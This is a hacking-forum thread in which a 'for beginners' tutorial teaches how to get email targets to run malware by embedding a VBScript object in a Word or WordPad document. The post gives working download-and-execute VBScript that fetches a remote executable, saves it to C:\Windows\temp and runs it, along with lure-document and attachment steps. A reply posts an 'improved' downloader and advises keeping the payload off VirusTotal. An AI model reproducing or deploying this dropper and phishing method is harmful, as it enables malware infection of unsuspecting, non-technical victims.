[For Beginners] Making people clicking on your executable

[drhack0000]

Trying to make people click on your executable is a art nowadays, even if all the hooks are set in your fake email there is a problem of not been possible to send the executable. A good choice is create a Word document (.doc) or a Rich Text Format (.rtf) and insert a object.

For this article i used a common vbs dropper that was configured to download and execute after the user double click in the object inside the document.

Most people thinks that Word document are only harmful if macro is activated, they are wrong.

101 lesson

1 - Let's do this. Save the following code as file.vbs

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://127.0.0.1/1.exe", False
xHttp.Send
with bStrm
     .type = 1 '
     .open
     .write xHttp.responseBody
    .savetofile "C:\Windows\temp\file.exe", 2 '
end with
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("C:\Windows\temp\file.exe"), 1, True

2 - Change http://127.0.0.1/1.exe to your remote file and keep C:\Windows\temp\file.exe as it is.
(Use your own exe instead of file.vbs as it is detected. This is for demo purpose only)

3 - Open Wordpad or Winword (In this example, i'm using Wordpad).

4 - Create a good document with a logo and add as many elements as you can to make it believable like signature, etc.

5 - Write the sentence "Double click below if not showing the image"

6 - And then click on "Insert a object"

7 - Select "Create from file" and select the vbs file

8 - Right click in the icon and "Packager Shell Object Object" > "Rename Package" and remove the "label"

9 - Save the document and send as attachment to your target email.

Note: This method works only with non tech people. The reason why this method works is because users have more trust in clicking in a link inside a document than clicking directly on a exe.
Download:

NitroFlare - Upload Files

Upload your files at maximum speed! You can use this service to share your creations, use as a virtual backup and share your files with your friends! You can upload up to 10 GB files, for free!

nitro.download

Virus Scan: Full of virus for file.vbs
Not Scanned to not disclose method

 

[Average]

Method for .doc ?

Amazing work

 

[Shelly1999]

Method for .doc ?

Amazing work

Macros probably

 

[Ex Coder]

good write up there. will post something related too soon

 

[Дьяволдьявола]

I think this method will display warning to user, or do you bypass the check? Very good simple code for new coders

 

[k1llph1ll]

This is a good method an it still works but a more effective method would be to trigger a process to start (like downloading a beacon) upon execution of the word document.

 

[pierre668]

I cannot login no more into the panel ???

 

[qGodless]

9/26

 

[qGodless]

Hey, I made a better version:
Sub HTTPDownload( myURL, myPath )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
If objFSO.FolderExists( myPath ) Then
strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) )
ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then
strFile = myPath
End If
Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True )
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, false
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
End Sub
HTTPDownload "", "C:\Windows\temp"

WScript.Sleep 1000

Dim Fso
Set Fso = WScript.CreateObject("Scripting.FileSystemObject")
Fso.MoveFile "C:\Windows\temp\", "C:\Windows\temp\.exe"

WScript.Sleep 1000

Set objShell = wscript.createobject("wscript.shell")
Set oExec = objShell.Exec("C:\Windows\temp\.exe")

WScript.Sleep 1000


Please dont use virus total